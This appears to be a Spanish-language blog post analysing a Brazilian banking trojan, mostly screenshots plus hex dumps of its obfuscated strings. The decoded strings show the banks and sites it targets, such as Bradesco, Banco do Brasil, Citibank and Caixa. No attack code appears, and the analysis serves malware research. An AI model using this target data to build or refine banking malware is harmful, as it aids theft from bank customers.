<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif_8f6v38WM3Bzlf4kAnUbz-YSLN-FTOuDleDJ9NkAuGVbxXOhMh8bGfBp1e9mKWxjREiutuwpBEjilAzd4D52iIRo26K48bHrWPMghGYDMUh_l1zlV7OrmgZvT5nFszPGynrOiyr9A90/s1600/AVG.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="49" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif_8f6v38WM3Bzlf4kAnUbz-YSLN-FTOuDleDJ9NkAuGVbxXOhMh8bGfBp1e9mKWxjREiutuwpBEjilAzd4D52iIRo26K48bHrWPMghGYDMUh_l1zlV7OrmgZvT5nFszPGynrOiyr9A90/s400/AVG.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM2T_wE7Tpu8N0Qyz2LF-I043GXR4C3_qu3UOKdNuZQZcykTwZ4QTuDs6ZdMqItaOR1cmeEFzKAjNwFl2XWak80F15h7rsksSafsL_SibZ4rYZVA44Gcmr08scC_OyyyhvOh39zivb_N0/s1600/bk01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM2T_wE7Tpu8N0Qyz2LF-I043GXR4C3_qu3UOKdNuZQZcykTwZ4QTuDs6ZdMqItaOR1cmeEFzKAjNwFl2XWak80F15h7rsksSafsL_SibZ4rYZVA44Gcmr08scC_OyyyhvOh39zivb_N0/s400/bk01.jpg" width="400" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtDoAL9-bEvnPcwDaoF6dm2ab1R5hyphenhyphen_sl3y1oE9IVUxUOKZPsqL-NQl94m69P3o-KBokG_S-d5qnG0jwE6Co9Y4x18Xjg1QVlJAltJEp4Ado8_1LeHRFiqszlXlQ0q4I0LfB3IlOmXBxo/s1600/bk03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtDoAL9-bEvnPcwDaoF6dm2ab1R5hyphenhyphen_sl3y1oE9IVUxUOKZPsqL-NQl94m69P3o-KBokG_S-d5qnG0jwE6Co9Y4x18Xjg1QVlJAltJEp4Ado8_1LeHRFiqszlXlQ0q4I0LfB3IlOmXBxo/s400/bk03.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5j0SRwx_mFgbTiNgmnMDEsfpeySLKWp8ZrYWaewCScySuA3nwJMKdL4wDtamiWksTGHwOCf_Clf5d7ij6Lej-pHR9T7GxbT4syTaYWfl3nEBQ2ZY43GEOtxlF5shjB6-L5T7whnxQwV8/s1600/bk04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5j0SRwx_mFgbTiNgmnMDEsfpeySLKWp8ZrYWaewCScySuA3nwJMKdL4wDtamiWksTGHwOCf_Clf5d7ij6Lej-pHR9T7GxbT4syTaYWfl3nEBQ2ZY43GEOtxlF5shjB6-L5T7whnxQwV8/s400/bk04.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVKnYlnxH232qEYLPlVOWrcs4X0Q2ZksBgW5tBjp5H83DWFlJN_CO6HVqYQ-Y_TrFkM_2LKlh0sz_OJQxnAv0UvrLd-unOAcIAvvnpbv4qvEqMAa6_XyDNWbxSzLLNrI-HLW67usr8vqw/s1600/bk05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVKnYlnxH232qEYLPlVOWrcs4X0Q2ZksBgW5tBjp5H83DWFlJN_CO6HVqYQ-Y_TrFkM_2LKlh0sz_OJQxnAv0UvrLd-unOAcIAvvnpbv4qvEqMAa6_XyDNWbxSzLLNrI-HLW67usr8vqw/s400/bk05.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF5zQc_iekmiJ2Hy1nSiCmIotNu6EonkPhyavwB5o5lwIhssuy35SkpjfgxLNR3dR_VaNd_0y106zLt_dymQJgGXHDOG0kZDXrQT2WS5bID5q0J6oOoQymqrFmpmC3OUiHPCacZSE2hyphenhypheno/s1600/bk06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF5zQc_iekmiJ2Hy1nSiCmIotNu6EonkPhyavwB5o5lwIhssuy35SkpjfgxLNR3dR_VaNd_0y106zLt_dymQJgGXHDOG0kZDXrQT2WS5bID5q0J6oOoQymqrFmpmC3OUiHPCacZSE2hyphenhypheno/s400/bk06.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRAekh5XIOpibqN9C0T3eUM1fL2NjIkXeTCgYyo27AYELRyypvPSiBx0sriHtCr5eRTygYzCG8Oqt4uI3hIqNwDYdnPwbdiXhbAXKb9wiGFzyZAiE2a0cD1TOLMEeT-9Eo-lNV-6_FjMw/s1600/bk07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRAekh5XIOpibqN9C0T3eUM1fL2NjIkXeTCgYyo27AYELRyypvPSiBx0sriHtCr5eRTygYzCG8Oqt4uI3hIqNwDYdnPwbdiXhbAXKb9wiGFzyZAiE2a0cD1TOLMEeT-9Eo-lNV-6_FjMw/s400/bk07.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4WmstVMuqX9zb_yH3gkm5a4UFSC7Le7da0X87-cdYQxGBTjyjT3nTVSZBVSZIzZnGMiJVpGHFSVx99fPpNdRA9BFnLbLwS81W3BQ6VyKcCIO9K0iAl-_6nupwC7Ehe60-Bb5oKsUe_4/s1600/bk08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4WmstVMuqX9zb_yH3gkm5a4UFSC7Le7da0X87-cdYQxGBTjyjT3nTVSZBVSZIzZnGMiJVpGHFSVx99fPpNdRA9BFnLbLwS81W3BQ6VyKcCIO9K0iAl-_6nupwC7Ehe60-Bb5oKsUe_4/s400/bk08.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUPmoj_gdZbNiCQGW_kKsfE9TadjrglNwTkBx4d_Tc4tX0azAvZPcJL7r8YK4O0BbETTeLeQTTWQDhMspI_NydHElwqU4axQO8CCxI3s8RiErrwYwopwB6D-PEgFsah4GIL0JcGujp0jY/s1600/bk09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUPmoj_gdZbNiCQGW_kKsfE9TadjrglNwTkBx4d_Tc4tX0azAvZPcJL7r8YK4O0BbETTeLeQTTWQDhMspI_NydHElwqU4axQO8CCxI3s8RiErrwYwopwB6D-PEgFsah4GIL0JcGujp0jY/s400/bk09.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmDLf2Iw5iwmHhcA77ar2nlplGqu93mofzkvEOp2i4RvaewxDQRielGpHIbtXp4KttezxBx8IqfMfdJb2IUF0DbAYnzhCn7kmXEQNNr-hsJCcvxGGO16x9gvOVQZPeZUz2BgQoYJvbPjc/s1600/bk10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmDLf2Iw5iwmHhcA77ar2nlplGqu93mofzkvEOp2i4RvaewxDQRielGpHIbtXp4KttezxBx8IqfMfdJb2IUF0DbAYnzhCn7kmXEQNNr-hsJCcvxGGO16x9gvOVQZPeZUz2BgQoYJvbPjc/s400/bk10.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4RBVLcuztyKAqZYFkwSiDBpOhbyAibcupDm4uXdjDk5fDuyoUjYPEFADTj9aPO1nL8zMTzuMAhFnPbO_NsORMepBK1iJvsdkXSyES0v3Z3y3lu7rCnHQwf-XVnjX3rrK1W9SR8Mt41U/s1600/bk11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4RBVLcuztyKAqZYFkwSiDBpOhbyAibcupDm4uXdjDk5fDuyoUjYPEFADTj9aPO1nL8zMTzuMAhFnPbO_NsORMepBK1iJvsdkXSyES0v3Z3y3lu7rCnHQwf-XVnjX3rrK1W9SR8Mt41U/s400/bk11.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA-QsZpN0DigpKwDneVKdseGOOeCD2kxfT-lwZ8ypdSDCGn736zbDdeqCyKwtETJZ_0JQn_1ykPACYKRW3GNNwCSkYS7oUkABhOc9fR41FEg-QuravpdBJNTPHiT3p1ZQ2vgx5AMj2gUI/s1600/bk12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA-QsZpN0DigpKwDneVKdseGOOeCD2kxfT-lwZ8ypdSDCGn736zbDdeqCyKwtETJZ_0JQn_1ykPACYKRW3GNNwCSkYS7oUkABhOc9fR41FEg-QuravpdBJNTPHiT3p1ZQ2vgx5AMj2gUI/s400/bk12.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfvuwmkiXbAm0EDgoU8o2xLJY14l4SyOtho7h6QSY6NyH3qYu9qCyogCWJdXVkTGib43e6lSuSkZPABo4xx6HRxVDhvj9rGBK4PmB0qoLevqz-mfWLkcoMFbiWWUqxYU4A8kcp_5ERvPE/s1600/bk13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfvuwmkiXbAm0EDgoU8o2xLJY14l4SyOtho7h6QSY6NyH3qYu9qCyogCWJdXVkTGib43e6lSuSkZPABo4xx6HRxVDhvj9rGBK4PmB0qoLevqz-mfWLkcoMFbiWWUqxYU4A8kcp_5ERvPE/s400/bk13.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVIMWHz_j8BLeSPCla9Yr2UGo7H-H2nYRibthTSPJffsQr2vhxFDqgt9T6C4q5p8KtpHpgtCuExwEF42x6HVGjE9MYf-yQ6JZ6BKQKk0eTDYY4VYSHfSjRbrGHkuye2FLBo0_4446-N68/s1600/bk14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVIMWHz_j8BLeSPCla9Yr2UGo7H-H2nYRibthTSPJffsQr2vhxFDqgt9T6C4q5p8KtpHpgtCuExwEF42x6HVGjE9MYf-yQ6JZ6BKQKk0eTDYY4VYSHfSjRbrGHkuye2FLBo0_4446-N68/s400/bk14.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AHakJpwSBs98MeSRZL6NrDLgXP2PQBzoAyQb_0RSOcLVEuN9GOEsXJM3RPF-RW1k67VCTuJw9L1G8dPP_gF-rgB4qEsGovRjRPz_PxWZaC5kCeA5TQ66wQ0gF4N2EeMZLJ_deas4sbY/s1600/bk15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AHakJpwSBs98MeSRZL6NrDLgXP2PQBzoAyQb_0RSOcLVEuN9GOEsXJM3RPF-RW1k67VCTuJw9L1G8dPP_gF-rgB4qEsGovRjRPz_PxWZaC5kCeA5TQ66wQ0gF4N2EeMZLJ_deas4sbY/s400/bk15.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinp8DcfS3iomWMlVenEpR_ogN1PzzmHtnDP6jWrt46DKaxTZxyk1KIDvlEFMyyaQvadVMge-soxmS7TJtJwrMC5DcCNe_yRODK05XJ4pu7Zr24x7J-7HXOzHfS5ZmzWeyit0oajIQTNFE/s1600/bk16.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinp8DcfS3iomWMlVenEpR_ogN1PzzmHtnDP6jWrt46DKaxTZxyk1KIDvlEFMyyaQvadVMge-soxmS7TJtJwrMC5DcCNe_yRODK05XJ4pu7Zr24x7J-7HXOzHfS5ZmzWeyit0oajIQTNFE/s400/bk16.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZRL-6TzwEOS9yhDjt-9J_7M52E5lUfM8kfcH1Cp0W31MaEsBAst5OkUIoKD0sPPebne5OQTAxx2J0GuJUbi00QNY1ptXyZIphm4wQxRnI4So5-wiynNUpEVKu58Oa8LIJlDKhRvI8b4A/s1600/gbplugin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZRL-6TzwEOS9yhDjt-9J_7M52E5lUfM8kfcH1Cp0W31MaEsBAst5OkUIoKD0sPPebne5OQTAxx2J0GuJUbi00QNY1ptXyZIphm4wQxRnI4So5-wiynNUpEVKu58Oa8LIJlDKhRvI8b4A/s400/gbplugin.jpg" width="400" /></a></div>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> Aqui parte de las cadenas ofuscadas y el resultado de su decodificación.</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040B8 37 41 38 34 43 45 37 34 7A84CE74</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040C0 38 42 43 37 30 33 35 32 8BC70352</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040C8 46 38 32 31 35 36 38 46 F821568F</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040D0 33 43 31 39 36 41 41 41 3C196AAA</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040D8 32 46 39 39 42 34 31 30 2F99B410</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040E0 42 37 39 43 46 30 30 37 B79CF007</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040E8 33 33 41 31 33 30 44 46 33A130DF</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040F0 31 42 34 42 38 45 39 38 1B4B8E98</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040F8 44 33 30 43 42 34 45 43 D30CB4EC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C04100 30 34 34 39 38 44 33 34 04498D34</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C04108 41 31 34 30 46 39 31 37 A140F917</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C06F2C 42 72 61 64 65 73 63 6F Bradesco</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F34 20 4E 65 74 20 45 78 70 Net Exp</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F3C 72 65 73 73 20 28 42 72 ress (Br</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F44 61 64 65 73 63 6F 20 4E adesco N</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F4C 65 74 20 45 78 70 72 65 et Expre</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F54 73 73 29 ss)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADD4 39 45 43 39 31 37 43 44 9EC917CD</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADDC 37 43 44 38 30 32 31 36 7CD80216</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADE4 36 32 45 32 36 41 46 42 62E26AFB</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADEC 35 36 46 41 36 38 39 45 56FA689E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A060 53 65 72 61 73 61 20 45 Serasa E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A068 78 70 65 72 69 61 6E 00 xperian.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A070 22 00 00 00 01 00 00 00 "... ...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A078 11 00 00 00 42 61 6E 63 ...Banc</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A080 6F 20 64 6F 20 4E 6F 72 o do Nor</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A088 64 65 73 74 65 deste</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A0F8 74 72 61 6E 73 66 65 72 transfer</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A100 65 6E 63 69 61 73 00 encias.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A444 44 30 31 46 42 43 36 42 D01FBC6B</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A44C 38 37 44 41 37 43 45 42 87DA7CEB</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A454 37 34 44 41 30 36 34 31 74DA0641</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A45C 35 39 38 39 43 43 37 31 5989CC71</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A464 44 32 38 32 32 43 41 33 D2822CA3</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A46C 46 37 31 37 34 38 35 43 F717485C</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A474 38 35 44 46 37 31 41 43 85DF71AC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A47C 35 37 38 44 43 46 38 31 578DCF81</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A484 44 37 D7</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03C98 42 61 6E 63 6F 20 64 65 Banco de</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA0 20 42 72 61 73 ED 6C 69 Brasíli</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA8 61 00 a.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03CD8 5B 62 62 2E 63 6F 6D 2E [bb.com.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CE0 62 72 5D 00 br].</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C061C0 43 36 30 36 34 35 46 38 C60645F8</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061C8 37 34 45 31 37 43 39 45 74E17C9E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061D0 33 42 39 32 33 39 35 33 3B923953</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061D8 38 44 34 35 00 8D45.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C09A5C 77 77 77 2E 62 62 2E 63 www.bb.c</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C09A64 6F 6D 2E 62 72 om.br</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03CF0 37 42 45 35 37 46 41 39 7BE57FA9</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CF8 35 45 46 41 36 35 45 33 5EFA65E3</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D00 37 43 44 37 37 38 44 30 7CD778D0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D08 43 36 36 46 45 41 31 30 C66FEA10</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D20 62 61 6E 63 6F 62 72 61 bancobra</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D28 73 69 6C 2E 63 6F 6D 00 sil.com.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A004 39 36 44 34 30 32 33 30 96D40230</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A00C 43 41 30 36 35 37 38 45 CA06578E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A014 44 36 43 45 32 38 35 45 D6CE285E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0591C 56 65 72 69 66 69 63 61 Verifica</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05924 20 42 42 00 BB.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A02C 43 37 33 32 41 42 35 45 C732AB5E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A034 39 32 33 35 36 44 45 35 92356DE5</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A03C 36 43 42 34 43 46 37 36 6CB4CF76</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A044 45 46 32 36 42 42 36 30 EF26BB60</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0586C 42 61 6E 63 6F 20 64 6F Banco do</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05874 20 42 72 61 73 69 6C 00 Brasil.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C05888 44 42 37 43 43 38 37 39 DB7CC879</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05890 42 41 31 39 36 42 41 45 BA196BAE</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05898 45 34 36 34 45 32 36 45 E464E26E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058A0 39 38 38 33 44 31 37 42 9883D17B</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058A8 44 44 37 39 41 32 33 44 DD79A23D</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058B0 39 42 42 37 31 46 42 43 9BB71FBC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058B8 36 33 00 63.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C093C0 68 74 74 70 73 3A 2F 2F https://</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C093C8 77 77 77 32 2E 62 61 6E www2.ban</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C093D0 63 6F 62 72 61 73 69 6C cobrasil</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03CB8 35 32 41 43 33 36 45 30 52AC36E0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CC0 31 35 42 46 30 43 34 35 15BF0C45</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CC8 38 31 81</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C093E8 42 61 6E 65 73 74 65 73 Banestes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C061EC 32 43 35 37 46 38 32 39 2C57F829</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061F4 43 31 31 33 34 43 38 45 C1134C8E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061FC 43 30 C0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C058C8 43 69 74 69 62 61 6E 6B Citibank</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C058E0 37 36 39 31 46 39 35 45 7691F95E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058E8 39 35 33 32 39 43 43 39 95329CC9</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058F0 30 34 00 00 1E 00 00 00 04</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C05900 33 30 20 68 6F 72 61 73 30 horas</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C09448 43 31 33 43 39 36 42 33 C13C96B3</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C09450 34 42 38 37 43 32 31 32 4B87C212</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C09458 42 38 B8</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A32C 42 72 61 64 65 73 63 6F Bradesco</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2D4 41 46 43 35 31 46 44 31 AFC51FD1</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2DC 36 34 46 43 36 36 46 45 64FC66FE</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2E4 35 37 46 31 32 42 34 34 57F12B44</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2EC 38 34 41 32 33 42 46 38 84A23BF8</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2F4 35 38 46 39 33 41 39 31 58F93A91</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A29C 4E 61 76 65 67 61 64 6F Navegado</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2A4 72 20 45 78 63 6C 75 73 r Exclus</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2AC 69 76 6F 00 ivo.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07BFF438 42 38 31 41 42 30 36 31 B81AB061</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF440 39 35 33 46 39 35 43 45 953F95CE</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF448 37 41 45 34 37 46 44 39 7AE47FD9</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF450 37 44 41 33 32 36 43 35 7DA326C5</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF458 31 44 34 36 45 35 36 36 1D46E566</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF460 46 33 00 F3.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0B0D0 69 6E 74 65 72 6E 65 74 internet</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0B0D8 62 61 6E 6B 69 6E 67 63 bankingc</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0B0E0 61 69 78 61 00 aixa.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07BFF470 44 33 31 46 42 38 36 33 D31FB863</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF478 38 34 44 32 37 39 45 39 84D279E9</span><br />
